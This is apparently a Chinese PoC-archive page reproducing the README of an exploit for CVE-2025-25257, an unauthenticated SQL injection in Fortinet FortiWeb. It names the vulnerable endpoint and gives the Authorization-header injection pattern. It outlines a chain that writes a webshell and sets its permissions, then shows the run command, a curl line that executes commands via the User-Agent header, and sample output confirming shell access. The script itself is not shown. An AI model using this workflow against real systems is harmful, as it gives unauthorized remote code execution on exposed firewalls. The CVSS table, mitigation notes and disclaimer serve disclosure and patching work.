关联漏洞
标题:
Fortinet FortiWeb SQL注入漏洞
(CVE-2025-25257)
描述:Fortinet FortiWeb是美国飞塔(Fortinet)公司的一款Web应用层防火墙,它能够阻断如跨站点脚本、SQL注入、Cookie中毒、schema中毒等攻击的威胁,保证Web应用程序的安全性并保护敏感的数据库内容。 Fortinet FortiWeb 7.6.3及之前版本、7.4.7及之前版本、7.2.10及之前版本和7.0.10之前版本存在SQL注入漏洞,该漏洞源于对SQL命令中特殊元素中和不当,可能导致SQL注入攻击。
描述
PoC for CVE-2025-25257, a critical unauthenticated SQL injection in FortiWeb. Exploits SQLi via the Authorization header to write a webshell and gain RCE. No login required. Fully automated.
介绍
<p align="center">
<img src="sample.png" width="400" />
</p>
<h1 align="center">🚨 CVE-2025-25257 – FortiWeb SQLi to RCE</h1>
<p align="center"><b>Critical SQL Injection → Webshell Execution</b></p>
<p align="center"><code>Discovered and weaponized by 0xgh057r3c0n</code></p>
---
## 🧠 Vulnerability Overview
`CVE-2025-25257` affects FortiWeb systems exposing the endpoint `/api/fabric/device/status`, which fails to properly sanitize `Authorization` header input.
> An attacker can perform unauthenticated SQL injection to write a webshell on the server and execute commands remotely.
---
## 💥 Attack Flow
```text
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE
````
---
## 📍 Vulnerable Endpoint
```
GET /api/fabric/device/status
Header: Authorization: Bearer ';<SQLi>
```
---
## 🔓 Exploit Features
* SQLi via Bearer token
* SQL `INTO OUTFILE` to drop shell
* Python hook triggers chmod
* Commands executed via User-Agent
* Fully automated PoC
---
## 🧪 Usage
```bash
python3 CVE-2025-25257.py -t https://target-host.com
```
Then:
```bash
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi
```
---
## 🔧 Requirements
* Python 3.6+
* `requests` module
Install:
```bash
pip install requests
```
---
## 📤 Sample Output
```text
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)
[+] Webshell Ready:
> https://target-host.com/cgi-bin/x.cgi
> Send commands via User-Agent header
```
---
## 📊 CVSS Estimate
| Metric | Value |
| ------------------- | -------------- |
| Base Score | 9.8 (CRITICAL) |
| Attack Vector | Network |
| Privileges Required | None |
| User Interaction | None |
| Impact | High (C/I/A) |
---
## 🛡️ Mitigation
* Update FortiWeb firmware (if patch available)
* Sanitize all header inputs
* Restrict file write paths and CGI execution
---
## 👨💻 Author
**0xgh057r3c0n**
🔗 [github.com/0xgh057r3c0n](https://github.com/0xgh057r3c0n)
---
## ⚠️ Disclaimer
This proof-of-concept is for **educational and authorized testing** only.
Use at your own risk. The author is not responsible for misuse.
---
文件快照
[4.0K] /data/pocs/2b821728f5a49cb396016fb0ae017e2302d39746
├── [5.7K] CVE-2025-25257.py
├── [1.1K] LICENSE
├── [2.4K] README.md
└── [119K] sample.png
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。